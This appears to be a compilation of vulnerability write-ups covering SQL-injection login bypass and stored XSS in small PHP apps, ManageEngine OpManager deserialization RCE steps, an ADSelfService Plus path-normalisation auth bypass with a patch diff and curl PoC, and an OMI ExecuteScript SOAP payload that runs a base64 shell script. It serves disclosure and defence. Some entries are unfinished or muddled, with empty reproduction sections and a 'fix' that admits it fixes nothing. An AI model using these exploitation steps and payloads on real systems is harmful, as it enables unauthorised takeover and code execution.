Technical Analysis
CVE-nu11-13-091721
Vulnerability PHPapp code validate.phpand structure also
<?php require_once 'conn.php'; $username = $_POST['username']; $password = $_POST['password']; $query = $conn->query("SELECT * FROM `admin` WHERE `username` = '$username' && `password` = '$password'") or die(mysqli_error()); $validate = $query->num_rows; $fetch = $query->fetch_array(); if($validate > 0){ echo "Success"; session_start(); $_SESSION['admin_id'] = $fetch['admin_id']; }else{ echo "Error"; }
Simple fix.
- WARNING: THIS IS
NOT FIXOF THE PROBLEM, Just an example =)
<?php require_once 'conn.php'; $username = $_POST['username']; $password = $_POST['password']; $query = $conn->query("SELECT * FROM `admin` WHERE `username` = ('$username') && `password` = '$password'") or die(mysqli_error()); $validate = $query->num_rows; $fetch = $query->fetch_array(); if($validate > 0){ echo "Success"; session_start(); $_SESSION['admin_id'] = $fetch['admin_id']; }else{ echo "Error"; }
Description:
The Simple Membership System using PHP and AJAX is vulnerable to remote SQL-Injection-Bypass-Authentication for the admin account/XSS-Stored PWNED.
remote SQL-Injection-Bypass-Authentication: https://portswigger.net/support/using-sql-injection-to-bypass-authentication.
The parameters (username and password) from the login form is not protected correctly and there is no security and escaping from malicious payloads.
When the user will sending a malicious query or malicious payload to the MySQL server for login to the admin account on the system,
he can bypass the login credentials and take control of this account. And the second time he can adding an payload by using XSS-Stored
BR
- [+] @nu11secur1ty System Administrator – Infrastructure and Penetration Testing Engineer
Reproduce:
Proof:
BR nu11secur1ty
- News Article or Blog (https://github.com/trump88/CVE-2021-35975)
Technical Analysis
CVE-nu11-12-09162021
Description:
The South Gate Inn Online Reservation System © South Gate Inn is vulnerable to remote SQL-Injection-Bypass-Authentication for the admin account and XSS-Stored PWNED.
remote SQL-Injection-Bypass-Authentication: https://portswigger.net/support/using-sql-injection-to-bypass-authentication.
The parameters (email and Password) from the login form are not protected correctly and there is no security and escaping from malicious payloads.
When the user will sending a malicious query or malicious payload to the MySQL server for login to the admin account on the system,
he can bypass the login credentials and take control of this account.
And the second time he can access the admin account and adding a payload by using the XSS-Stored technique which can break the MySQL server.
Reproduce:
Proof:
Technical Analysis
The com.adventnet.me.itom.framework.ITOMObjectInputStream is a class that was added to fix the serialization issue originally disclosed in CVE-2020-28653. It’s located in the OpManagerServerClasses.jar file. It works by overriding the resolveClass method and using a boolean state variable classResolved. When the object is initialized, the caller must call setClassName to add the names of one or more classes that are allowed to be deserialized. The classResolved state variable is initialized to false, and when a class is resolved if it’s name is in the list of allowed classes, it’s set to true and resolving carries on as usual. If no allowed classes are defined, or the class name that is being deserialized is not in the allowed list, an exception is thrown.
A flaw exists in this implementation whereby if a single ITOMObjectInputStream instance is used for multiple readObject calls, then only the first will be protected because the classResolved state variable will persist into subsequent calls. This means a vulnerable use of this class would initialize it and then use the same instance for 2 or more readObject calls. The first object must be of the expected type, but any after that can be used for malicious deserialization purposes.
Such a vulnerable invocations is present in the com.adventnet.tools.sum.server.session.SUMServerIOAndDataAnalyzer class’s process method. This class is located in the AdventNetSUMServer.jar file. It can be accessed by sending a serialized SUMPDU object with an OPEN_SESSION request (see SUMHttpRequestHandler.processSumPDU). This will cause SUMServerIOAndDataAnalyzer to be initialized as the socket client. Once initialized, the data field of serialized SUMPDU object will be passed to the SUMServerIOAndDataAnalyzer.process method where the vulnerable serialization operations can occur.
Technical Analysis
CVE-nu11-11
Description:
The AHSS-PHP (by: oretnom23 ) v1.0 is vulnerable in the application /scheduler/classes/Login.php to remote SQL-Injection-Bypass-Authentication + XSS-Stored Hijacking PHPSESSID
- m0re info: https://portswigger.net/support/using-sql-injection-to-bypass-authentication.
The parameter (username) from the login form is not protected correctly and there is no security and escaping from malicious payloads.
When the user will sending a malicious query or malicious payload to the MySQL server he can bypass the login credentials and take control of the administer account.
- XSS – Stored PHPSESSID Vulnerable
- The vulnerable XSS app: is “manage_assembly”, parameters: “room_name” “location” and “description”
After the successful SQL injection, the malicious user can be storing an XSS payload whit who can take the
active PHPSESSID session.
- remote PHPSESSID – Injection
- After the successful XSS attack the malicious user can take control of the administrative account of the system from everywhere
by using the PHPSESSID, and then he can make a lot of bad things!
CONCLUSION:
This vendor must STOP creating all these broken projects and vulnerable software programs, probably he is not a developer!
BR
- [+] @nu11secur1ty System Administrator – Infrastructure and Penetration Testing Engineer
Reproduce:
Proof:
BR nu11secur1ty
Technical Analysis
Description
On September 7, 2021, Zoho published a security advisory and software update for CVE-2021-40539, a REST API authentication bypass vulnerability in ManageEngine ADSelfService Plus that, if successfully exploited, could result in unauthenticated remote code execution (RCE). CISA warns that CVE-2021-40539 is being exploited in the wild, so patching should be performed on an emergency basis.
Affected products
ADSelfService Plus builds up to 6113 are affected.
Technical analysis
The auth bypass appears to be a path normalization bug in REST API routing.
Patch
--- a/ManageEngineADSFrameworkJava.ujar/com/manageengine/ads/fw/api/RestAPIUtil.java +++ b/ManageEngineADSFrameworkJava.ujar/com/manageengine/ads/fw/api/RestAPIUtil.java @@ -2,6 +2,7 @@ package com.manageengine.ads.fw.api; import com.adventnet.ds.query.Column; import com.adventnet.ds.query.Criteria; +import com.adventnet.iam.security.SecurityUtil; import com.adventnet.persistence.DataObject; import com.adventnet.persistence.Row; import com.adventnet.persistence.WritableDataObject; @@ -28,6 +29,7 @@ import java.util.logging.Logger; import java.util.regex.Pattern; import javax.net.ssl.SSLHandshakeException; import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; import org.apache.commons.codec.binary.Base64; import org.apache.commons.io.IOUtils; import org.json.JSONArray; @@ -167,6 +169,9 @@ public class RestAPIUtil extends RestAPIUtil implements RestAPIConstants { throw new Exception("00000012"); } catch (IOException ex) { out.log(Level.SEVERE, "", ex); + InputStream isr = connection.getErrorStream(); + if (isr != null) + return getString(isr); throw ex; } catch (Exception e) { out.log(Level.FINE, " ", e); @@ -667,10 +672,47 @@ public class RestAPIUtil extends RestAPIUtil implements RestAPIConstants { } catch (Exception ex) { out.log(Level.INFO, "Unable to get API_URL_PATTERN.", ex); } - String reqURI = request.getRequestURI(); + String reqURI = SecurityUtil.getNormalizedURI(request.getRequestURI()); String contextPath = (request.getContextPath() != null) ? request.getContextPath() : ""; reqURI = reqURI.replace(contextPath, ""); reqURI = reqURI.replace("//", "/"); return Pattern.matches(restApiUrlPattern, reqURI); } + + public static Properties getParameters(HttpServletRequest request) { + Properties properties = new Properties(); + Enumeration<String> paramNames = request.getParameterNames(); + while (paramNames.hasMoreElements()) { + String paramName = paramNames.nextElement(); + String paramValue = request.getParameter(paramName); + if (paramValue != null) + properties.put(paramName, paramValue); + } + return properties; + } + + public static boolean isProductAPIAllowedOnDemo(HttpServletRequest request, HttpServletResponse response) { + try { + String requestURI = request.getRequestURI(); + String contextPath = request.getContextPath(); + requestURI = requestURI.replaceFirst(contextPath, ""); + requestURI = requestURI.replaceAll("//", "/"); + Properties parameters = getParameters(request); + JSONObject apiDetails = getAPIDetails(requestURI, parameters); + if (apiDetails == null) + return true; + if (!apiDetails.getBoolean("IS_ALLOWED_ON_DEMO") && CommonUtil.isDemo().booleanValue()) { + JSONObject responseObj = new JSONObject(); + responseObj.put("SEVERITY", "SEVERE"); + responseObj.put("STATUS_MESSAGE", "ads.restapi.error.url_restricted_for_demo"); + responseObj.put("eSTATUS", "ads.restapi.error.url_restricted_for_demo"); + responseObj.put("ERROR_CODE", "00000014"); + CommonUtil.setResponseJSON(response, responseObj); + return false; + } + } catch (Exception ex) { + out.log(Level.INFO, "Exception occured in ADSFilter isAPIAllowedOnDemo :" + ex); + } + return true; + } }
public static String getNormalizedURI(String path) { if (path == null) return null; String normalized = path; if (normalized.indexOf('\\') >= 0) normalized = normalized.replace('\\', '/'); if (!normalized.startsWith("/")) normalized = "/" + normalized; boolean addedTrailingSlash = false; if (normalized.endsWith("/.") || normalized.endsWith("/..")) { normalized = normalized + "/"; addedTrailingSlash = true; } while (true) { int index = normalized.indexOf("/./"); if (index < 0) break; normalized = normalized.substring(0, index) + normalized.substring(index + 2); } while (true) { int index = normalized.indexOf("/../"); if (index < 0) break; if (index == 0) return null; int index2 = normalized.lastIndexOf('/', index - 1); normalized = normalized.substring(0, index2) + normalized.substring(index + 3); } if (normalized.length() > 1 && addedTrailingSlash) normalized = normalized.substring(0, normalized.length() - 1); return normalized; }
PoC
The following request is largely benign and returns static content.
wvu@kharak:~$ curl -v --path-as-is http://172.16.57.9:8888/./RestAPI/LogonCustomization -d methodToCall=previewMobLogo
* Trying 172.16.57.9...
* TCP_NODELAY set
* Connected to 172.16.57.9 (172.16.57.9) port 8888 (#0)
> POST /./RestAPI/LogonCustomization HTTP/1.1
> Host: 172.16.57.9:8888
> User-Agent: curl/7.64.1
> Accept: */*
> Content-Length: 27
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 27 out of 27 bytes
< HTTP/1.1 200 OK
< Set-Cookie: JSESSIONIDADSSP=37895862ACDA03D1FACDAC9BD6161568; Path=/; HttpOnly
< Content-Type: text/html;charset=UTF-8
< Transfer-Encoding: chunked
< Date: Tue, 14 Sep 2021 18:53:46 GMT
<
* Connection #0 to host 172.16.57.9 left intact
<script type="text/javascript">var d = new Date();window.parent.$("#mobLogo").attr("src","/temp/tempMobPreview.jpeg?"+d.getTime());window.parent.$("#tabLogo").attr("src","/temp/tempMobPreview.jpeg?"+d.getTime());</script>* Closing connection 0
wvu@kharak:~$
Guidance
Update ADSelfService Plus to the latest build, 6114, using the service pack.
CISA strongly urges organizations ensure ADSelfService Plus is not directly accessible from the internet.
Resources
- https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html
- https://www.manageengine.com/products/self-service-password/release-notes.html
- https://www.manageengine.com/products/self-service-password/service-pack.html
- https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus
Technical Analysis
RCE PoC using ExecuteScript (multi-line shell script execution):
wvu@kharak:~/Downloads$ curl -vs http://127.0.0.1:5985/wsman -H "Content-Type: application/soap+xml" -d @payload.xml | xmllint --format -
* Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 5985 (#0)
> POST /wsman HTTP/1.1
> Host: 127.0.0.1:5985
> User-Agent: curl/7.64.1
> Accept: */*
> Content-Type: application/soap+xml
> Content-Length: 1679
> Expect: 100-continue
>
* Done waiting for 100-continue
} [1679 bytes data]
* We are completely uploaded and fine
< HTTP/1.1 200 OK
< Content-Length: 1393
< Connection: Keep-Alive
< Content-Type: application/soap+xml;charset=UTF-8
<
{ [1393 bytes data]
* Connection #0 to host 127.0.0.1 left intact
* Closing connection 0
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsen="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:e="http://schemas.xmlsoap.org/ws/2004/08/eventing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wsmb="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:wsman="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" xmlns:msftwinrm="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:wsmid="http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd">
<SOAP-ENV:Header>
<wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To>
<wsa:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</wsa:Action>
<wsa:MessageID>uuid:19754ED3-CC01-0005-0000-000000010000</wsa:MessageID>
<wsa:RelatesTo>uuid:00B60932-CC01-0005-0000-000000010000</wsa:RelatesTo>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<p:SCX_OperatingSystem_OUTPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:ReturnValue>TRUE</p:ReturnValue>
<p:ReturnCode>0</p:ReturnCode>
<p:StdOut>
Hello
Goodbye
</p:StdOut>
<p:StdErr/>
</p:SCX_OperatingSystem_OUTPUT>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
wvu@kharak:~/Downloads$
payload.xml:
<?xml version="1.0"?> <s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema" xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"> <s:Header> <a:To>HTTP://127.0.0.1:5985/wsman/</a:To> <w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI> <a:ReplyTo> <a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address> </a:ReplyTo> <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action> <w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize> <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID> <w:OperationTimeout>PT1M30S</w:OperationTimeout> <w:Locale xml:lang="en-us" s:mustUnderstand="false"/> <p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/> <w:OptionSet s:mustUnderstand="true"/> <w:SelectorSet> <w:Selector Name="__cimnamespace">root/scx</w:Selector> </w:SelectorSet> </s:Header> <s:Body> <p:ExecuteScript_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem"> <p:Script>ZWNobyAiIg0KZWNobyAiSGVsbG8iDQplY2hvICJHb29kYnllIg==</p:Script> <p:Arguments/> <p:timeout>0</p:timeout> <p:b64encoded>true</p:b64encoded> </p:ExecuteScript_INPUT> </s:Body> </s:Envelope>
Technical Analysis
A deserialization vulnerability exists in the ManageEngine OpManager platform that can be leveraged by an unauthenticated attacker to execute code as the application user which is typically NT AUTHORITY\SYSTEM on Windows and root on Linux.
Exploitation can be broken down into three high level steps.
- Issue an HTTP request to the application’s page, to have an HTTP session cookie issued. For this purpose the login page works just fine.
- Issue a POST request to the
/servlets/com.adventnet.tools.sum.transport.SUMHandShakeServletresource with a body of\xac\xed\x00\x05\x77\x04\x00\x00\x03\xeawhich is 1002 serialized as a Java int. This command associates a handler to the HTTP session that is then exploited.
- Issue a POST request to the
/servlets/com.adventnet.tools.sum.transport.SUMCommunicationServletresource. The body of this request is the length in bytes of the serialized Java payload as a 32-bit unsigned, big endian value followed by the serialized Java payload.
In Ruby the POST body would be made like:
data = [ java_payload.length ].pack('N') + java_payload
Step 3 can be repeated multiple times to execute a different serialized Java payload to for example, execute multiple OS commands.
The default OpManager instance is vulnerable out of the box, there is no configuration necessary and a user never needs to have logged in. Technically, the HTTP request handler may fail in step 2 but it does so after the necessary request handler has been associated with the session, allowing exploitation to proceed regardless.
A patched version (v12.5.233 and later) will not respond with a body starting with \xac\ed\x00\x05 which can be used by an attacker to check for exploitability. The version number can also be found in the source of the login page by searching for paths beginning with /cachestart/#####/ where ##### is the 5-digit version number.
A bypass for the patch issued by ManageEngine is identified as CVE-2021-3287.
